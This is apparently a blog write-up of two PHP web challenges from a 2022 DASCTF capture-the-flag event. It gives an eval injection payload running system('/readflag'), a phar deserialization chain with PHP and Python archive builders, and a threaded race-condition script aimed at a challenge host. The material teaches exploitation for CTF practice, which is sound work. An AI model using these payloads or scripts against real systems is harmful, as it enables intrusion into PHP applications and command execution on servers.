2022 DASCTF Apr X FATE Anti-Epidemic Challenge: partial writeups



warmup-php

<?php
spl_autoload_register(function($class){
    require("./class/".$class.".php");   // any class name maps straight to ./class/<name>.php
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];           // class to instantiate, attacker-controlled
$properties = $_POST['properties'];  // property name => value pairs, attacker-controlled
class Action{

    public function __construct($action,$properties){

        $object=new $action();       // arbitrary instantiation of any autoloadable class
        foreach($properties as $name=>$value)
            $object->$name=$value;   // property spray: overwrite whatever the object exposes
        $object->run();              // the sink we have to reach
    }
}

new Action($action,$properties);
?>

Download the attachment; it is a pile of code. Working through it, the goal is to reach $object->run(): whatever class $action names is instantiated, every POSTed property is written onto the object, and then run() is called.

Only ListView in the attachment has a run() method, but ListView is an abstract class and cannot be instantiated with new directly.


So the class to instantiate is its concrete subclass TestView. Looking through the four classes in the attachment, the base class in Base.php contains an eval() call (in evaluateExpression()), which is the real sink.

The call chain is: ListView->run() -> ListView->renderContent() -> ListView->renderSection() -> TestView->renderTableBody() -> TestView->renderTableRow() -> Base->evaluateExpression(), and the expression handed to eval() comes from the rowHtmlOptionsExpression property, which we control through the property spray.

Payload (template={TableBody} selects the section that leads to renderTableBody(), data must be non-empty so a row is actually rendered):

GET: ?action=TestView

POST: properties[template]={TableBody}&properties[data]=123&properties[rowHtmlOptionsExpression]=system('/readflag');

A plain cat /flag gives nothing because the web user lacks permission on it; there is a /readflag in the filesystem root, so just run that instead.

soeasy_php

Whatever file you upload, the challenge turns it into a png. Open the developer tools (F12) and look at the page source.

A commented-out block here is very suspicious. Uncommenting it makes a button appear; after clicking it, visiting uploads/head.png shows that the file has changed. That suggests the avatar endpoint can be pointed at other files, so we try to read arbitrary files with it.

We use it to read the source:

edit.php

<?php

ini_set("error_reporting", "0");

class flag
{
    public function copyflag()
    {
        exec("/copyflag"); // runs as root: copies /flag to /tmp/flag.txt and chowns it to www-data:www-data
        echo "SFTQL";
    }

    public function __destruct()
    {
        $this->copyflag();
    }

}

function filewrite($file, $data)
{
    unlink($file);
    file_put_contents($file, $data);
}


if (isset($_POST['png'])) {
    $filename = $_POST['png'];
    // This filter only guards the read below; the symlink()/unlink() calls further
    // down still see $filename unfiltered
    if (!preg_match("/:|phar|\/\/|php/im", $filename)) {
        $f = fopen($filename, "r");
        $contents = fread($f, filesize($filename));
        if (strpos($contents, "flag{") !== false) {
            filewrite($filename, "Don't give me flag!!!");  // anti-read: any file holding "flag{" is clobbered
        }
    }

    if (isset($_POST['flag'])) {
        $flag = (string)$_POST['flag'];
        if ($flag == "Give me flag") {
            filewrite("/tmp/flag.txt", "Don't give me flag");
            sleep(2);
            die("no no no !");
        } else {
            filewrite("/tmp/flag.txt", $flag);  // won't show me the flag? I'll write my own
        }
        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {         // head.png becomes a symlink to whatever path we posted
            echo "成功更换头像";                   // "avatar changed"
        } else {
            unlink($filename);                   // unlink() on a phar:// path parses the archive and unserializes its metadata
            echo "非正常文件,已被删除";              // "abnormal file, deleted"
        };
    }
}

upload.php

<?php
if (!isset($_FILES['file'])) {
    die("请上传头像");   // "please upload an avatar"
}

$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";   // only the name is rewritten; the content is never checked
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
    echo "上传成功: ".$path;   // "upload succeeded: " followed by the stored path
};

With the source in hand, the plan is phar deserialization plus a race condition. Calling unlink() on a phar:// path makes PHP open the archive and unserialize the object stored in its manifest metadata, and edit.php hands us exactly that call: the preg_match filter (":", "phar", "//", "php") only guards the fopen()/fread() block, while symlink($filename, $head) further down sees $filename unfiltered, and when symlink() fails the else branch runs unlink($filename). A phar:// target padded so that symlink() fails therefore gets our archive parsed, the flag object's __destruct() fires, and exec("/copyflag") drops the real flag into /tmp/flag.txt. Reading it is the race: every edit.php request that sends flag overwrites /tmp/flag.txt again, a request with png=/tmp/flag.txt that sees "flag{" clobbers it with "Don't give me flag!!!", and the phar request itself unlinks uploads/head.png before its symlink() fails. So we need one request that re-links head.png to /tmp/flag.txt to land while /copyflag is running, and a GET of uploads/head.png right after it, before the next write.

First build the phar. It is uploaded through upload.php afterwards: the name becomes md5("png".name).".png", but the content is not checked, and the phar:// wrapper does not care about the extension.

<?php
// Generating the archive needs phar.readonly=0, e.g. php -d phar.readonly=0 gen.php
class flag
{
    public function copyflag()
    {
//        exec("/copyflag"); // on the target: copies /flag to /tmp/flag.txt as root and chowns it to www-data:www-data; kept commented so it does not run locally
        echo "SFTQL";
    }

    public function __destruct()
    {
        $this->copyflag();
    }

}
$a = new flag();

$phar = new Phar('a.phar'); // instantiate the Phar object for the operations below

$phar -> startBuffering(); // buffer the phar writes (nothing special here)

$phar -> setStub("<?php __HALT_COMPILER(); ?>"); // set the stub; fixed format

$phar -> setMetadata($a); // store our object in the metadata; this is what gets unserialized on the target

$phar -> addFromString("test.txt","helloworld!!"); // archive content; not used for exploitation, anything works

$phar -> stopBuffering(); // stop buffering and write a.phar to disk
?>
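For anyone without a PHP CLI at hand (or with phar.readonly left on), the following pure-Python builder, added here and not part of the original writeup, produces the same archive as the PHP script above and parses it back so you can check what the phar:// wrapper will hand to unserialize(). It follows the phar layout (stub, manifest, file contents, SHA1 signature ending in GBMB); the a.phar name, the test.txt entry and the O:4:"flag":0:{} metadata match the PHP script. php_object() is my own helper and only handles public scalar properties, and choosing SHA1 for the signature is an assumption (MD5, SHA256 and SHA512 are also valid types).

```python
"""Pure-Python phar builder/parser (added example, not from the writeup).

Layout: stub | u32 manifest length | manifest | file contents | signature,
where the signature trailer is <hash><u32 type>"GBMB" (SHA1 here).
"""
import hashlib
import struct
import zlib

PHAR_SIG_SHA1 = 0x0002            # signature type stored just before "GBMB"
PHAR_HDR_SIGNATURE = 0x00010000   # global flag: archive carries a signature
PHAR_API_VERSION = b"\x11\x00"    # API 1.1.0 (no-directory variant), two big-endian bytes
PHAR_ENT_PERM_DEF_FILE = 0o666    # per-file flags: permission bits only, no compression
HALT = b"__HALT_COMPILER();"


def php_serialize(value):
    """Minimal PHP serialize() for scalars (assumption: gadget props are scalars)."""
    if isinstance(value, bool):
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        value = value.encode()
    if isinstance(value, bytes):
        return b's:%d:"%s";' % (len(value), value)
    raise TypeError("unsupported type %r" % type(value))


def php_object(class_name, props=None):
    """Serialized object with public props, e.g. php_object("flag") -> O:4:"flag":0:{}"""
    props = props or {}
    body = b"".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
    return b'O:%d:"%s":%d:{%s}' % (len(class_name), class_name.encode(), len(props), body)


def build_phar(metadata, files, stub=b"<?php __HALT_COMPILER(); ?>\r\n"):
    """Assemble a SHA1-signed phar whose manifest metadata is `metadata` (serialized PHP)."""
    entries, contents = b"", b""
    for name, data in files.items():
        entries += struct.pack("<I", len(name)) + name
        # uncompressed size, timestamp, compressed size, crc32 of the uncompressed data
        entries += struct.pack("<IIII", len(data), 0, len(data), zlib.crc32(data) & 0xFFFFFFFF)
        entries += struct.pack("<II", PHAR_ENT_PERM_DEF_FILE, 0)  # flags, per-file metadata length
        contents += data
    alias = b""
    body = (struct.pack("<I", len(files)) + PHAR_API_VERSION
            + struct.pack("<I", PHAR_HDR_SIGNATURE)
            + struct.pack("<I", len(alias)) + alias
            + struct.pack("<I", len(metadata)) + metadata
            + entries)
    # Same padding hack as ext/phar (PHP bug #65028): a manifest length whose low byte is
    # \r or \n would be eaten by the stub scanner when the stub has no trailing newline.
    if (len(body) & 0xFF) in (0x0A, 0x0D):
        body += b"\x00"
    unsigned = stub + struct.pack("<I", len(body)) + body + contents
    return unsigned + hashlib.sha1(unsigned).digest() + struct.pack("<I", PHAR_SIG_SHA1) + b"GBMB"


def parse_phar(blob):
    """Verify the signature, then walk the manifest the way ext/phar does."""
    if blob[-4:] != b"GBMB":
        raise ValueError("missing GBMB trailer")
    if struct.unpack("<I", blob[-8:-4])[0] != PHAR_SIG_SHA1:
        raise ValueError("only SHA1 signatures are handled here")
    if hashlib.sha1(blob[:-28]).digest() != blob[-28:-8]:
        raise ValueError("signature mismatch (ext/phar rejects the archive before reading metadata)")
    pos = blob.index(HALT) + len(HALT)
    if blob[pos:pos + 3] == b" ?>":            # optional " ?>" followed by one optional newline
        pos += 3
        if blob[pos:pos + 2] == b"\r\n":
            pos += 2
        elif blob[pos:pos + 1] == b"\n":
            pos += 1
    manifest_len, = struct.unpack("<I", blob[pos:pos + 4])
    m = blob[pos + 4:pos + 4 + manifest_len]
    data_pos = pos + 4 + manifest_len          # file contents start right after the manifest
    count, = struct.unpack("<I", m[:4])
    flags, alias_len = struct.unpack("<II", m[6:14])   # bytes 4-5 are the API version
    p = 14 + alias_len
    meta_len, = struct.unpack("<I", m[p:p + 4])
    metadata = m[p + 4:p + 4 + meta_len]       # this is what unserialize() receives
    p += 4 + meta_len
    files = {}
    for _ in range(count):
        name_len, = struct.unpack("<I", m[p:p + 4])
        name = m[p + 4:p + 4 + name_len]
        p += 4 + name_len
        _usize, _ts, csize, crc, _fflags, fmeta_len = struct.unpack("<IIIIII", m[p:p + 24])
        p += 24 + fmeta_len
        data = blob[data_pos:data_pos + csize]
        data_pos += csize
        if zlib.crc32(data) & 0xFFFFFFFF != crc:
            raise ValueError("crc mismatch for %r" % name)
        files[name] = data
    return {"metadata": metadata, "files": files, "signed": bool(flags & PHAR_HDR_SIGNATURE)}


if __name__ == "__main__":
    # Same content as the PHP script above: a `flag` object as metadata plus one dummy file.
    phar = build_phar(php_object("flag"), {b"test.txt": b"helloworld!!"})
    with open("a.phar", "wb") as fh:
        fh.write(phar)
    print(parse_phar(phar)["metadata"])
```

Running the script writes a.phar in the current directory, ready for upload.php. Two points worth keeping in mind: ext/phar checks the signature before it reads the manifest, so any archive patched by hand must be re-signed (parse_phar() refuses a tampered one for the same reason), and the padding branch mirrors a quirk of PHP's own writer, which matters precisely for stubs like the one in the PHP script that end in " ?>" without a newline.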

Then race it with the script below. uploads/a70dd6bce58ad760de7810d5e5c12f85.png is the name upload.php returned for the uploaded archive. One thread triggers the phar unlink, one re-links head.png to /tmp/flag.txt, one reads head.png, and 20 rounds of the three are fired off to hit the window.

import requests
import threading

def readflag():
    # head.png is a symlink to /tmp/flag.txt (set up by linkflag); fetch it while
    # it still holds the real flag written by /copyflag
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/uploads/head.png"
    res = requests.get(url)
    print(res.text)

def phar():
    # "phar" is only filtered in the fopen() branch; symlink() fails on the padded
    # phar:// target, so edit.php falls through to unlink($filename) and the
    # archive's metadata is unserialized (flag::__destruct -> /copyflag)
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/edit.php"
    res = requests.post(url,data={
        "png":"phar://uploads/a70dd6bce58ad760de7810d5e5c12f85.png/test.txt/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
        "flag":"1"
    })
    # print(res.text)

def linkflag():
    url = "http://6e13bae3-53a2-4071-ad00-2b66090f6e11.node4.buuoj.cn:81/edit.php"
    res = requests.post(url,data={
        "png":"/tmp/flag.txt",
        "flag":"1"
    })
    # print(res.text)

for i in range(20):
    t1 = threading.Thread(target=readflag)
    t2 = threading.Thread(target=phar)
    t3 = threading.Thread(target=linkflag)
    t1.start()
    t2.start()
    t3.start()

If the flag does not show up, run it a few more times.


Author: Rolemee
License: unless stated otherwise, all articles on this blog are released under CC BY 4.0. Please credit Rolemee when reposting.